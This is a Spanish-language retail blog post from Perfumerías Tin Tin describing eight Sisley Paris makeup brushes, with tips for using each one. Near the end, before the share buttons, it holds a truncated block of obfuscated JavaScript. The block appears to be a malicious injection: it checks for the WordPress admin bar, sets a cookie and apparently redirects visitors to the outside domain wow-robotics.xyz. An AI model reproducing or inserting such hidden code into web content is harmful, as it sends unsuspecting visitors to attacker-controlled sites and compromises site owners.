Para conseguir un maquillaje perfecto necesitas las herramientas adecuadas. ¿sabes para qué sirve cada pincel y cómo utilizarlo? Si tienes dudas, quédate a leer el post de hoy y desde Perfumerías Tin Tin aclararemos todas tus dudas sobre los mejores pinceles y brochas de maquillaje.

Tu maquillaje de alta gama requiere de las mejores herramientas para que su aplicación sea fácil, práctica, suave y como resultado luzcas un maquillaje perfecto.

4

Sisley Paris ha creado 8 pinceles de seleccionadas fibras sintéticas, en colaboración con Raphaël, maestro pincelero francés desde 1793, para conseguir resultados profesionales al alcance de todos. Te los presentamos uno a uno:

Pincel para fondos de maquillaje fluidos:

sisley-pinceau-fond-de-teint-fluideTiene una forma plana y en cono, lo que permite aplicar y suavizar todas las bases fluidas de manera perfectamente uniforme.

Consejo de uso: Coloca una pequeña cantidad de tu fondo de maquillaje en la palma de la mano y coge pequeñas cantidades con la brocha y aplícalo en el rostro con ligeros toques, luego extiende tu fondo de maquillaje desde el centro del rostro con movimientos hacia adelante.

Pincel para base de maquillaje:

sisley-pinceau-font-de-teintCon su forma acabada en ángulo y cabezal redondeado es un pincel perfecto para extender todo tipo de bases de maquillaje, ya sean fluidas, en crema o en polvo.

Consejo de uso: Para el maquillaje fluido/en crema seguiremos los pasos anteriores aplicando el producto en la mano, aplicándolo a toque y perfeccionando desde el centro hacia adelante.  Para bases de maquillaje en polvo, puedes coger el producto directamente de su caja con el pincel y extenderlo desde el centro al exterior del rostro realizando movimientos circulares.

Brocha para el colorete: tiene una forma angular que permite aplicar el colorete de forma fácil y precisa para esculpir tu rostro.

Consejos de uso: Coge el producto directamente desde su estuche con la brocha, retira el exceso con un ligero toque fuera de la caja y aplica por encima de las mejillas y hacia la cien con movimientos circulares.

Pincel para polvos: es un abundante cepillo redondeado que te permite una aplicación rápida de polvos sueltos y compactos.

Consejo de uso: coge el producto directamente desde su estuche, retira el exceso y aplícalo con movimientos suaves desde el centro del rostro para conseguir un acabado natural y luminoso. Para mayor cobertura, empieza la aplicación en la zona T y luego hacia afuera con movimientos circulares.

Brocha Kabuki: es una brocha densa y redonda para esculpir y perfecta para un maquillaje rápido y sencillo con todos los tipos de polvos.

Consejo de uso: Puedes crear un efecto contouring con los polvos del colorete y extendiéndolos ligeramente por todo el rostro, o a través de ligeros toques en las zonas curvadas.

Pincel difuminador:

sisley-pinceau-estompe-paupieresCon su forma de doble cara biselada y suavidad incomparable permite esculpir la mirada de manera fácil.

Consejo de uso: Usa el lado plano del pincel para aplicar los tonos claros sobre todo el párpado. Y la punta para sombrear el tono más oscuro y formar una “banana” en la estructura hueca del párpado y el ojo.

 

Pincel de sombras:

sisley-pinceau-ombreur-paupieresTiene una forma redondeada, densa y firme que permite aplicar, fundir o intensificar todo tipo de sombras de ojos.

Consejo de uso: aplica con ligeros toques para conseguir un look intenso.

Pincel delineador de ojos:  

sisley-pinceau-traceur-paupieresTiene una forma plana y recta que permite intensificar la mirada con una sombra, delinear los ojos, y difuminar el lápiz de ojos.

Consejo de uso: puedes usar esta brocha de maquillaje seca o ligeramente humedecida para modular el efecto y precisión a la hora de intensificar, delineare o difuminar.

Todos estos pinceles de Sisley Paris han sido fabricados mezclando fibras lisas y onduladas para mejorar el rendimiento de tu maquillaje de alta gama. Las fibras han sido extruidas, cortada y redefinida para que destaquen por su suavidad en tu rostro. Son muy resistente e higiénicas ya que tienen menos poros y se adaptan a todas las texturas y usos. ¿Se puede pedir más? 

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone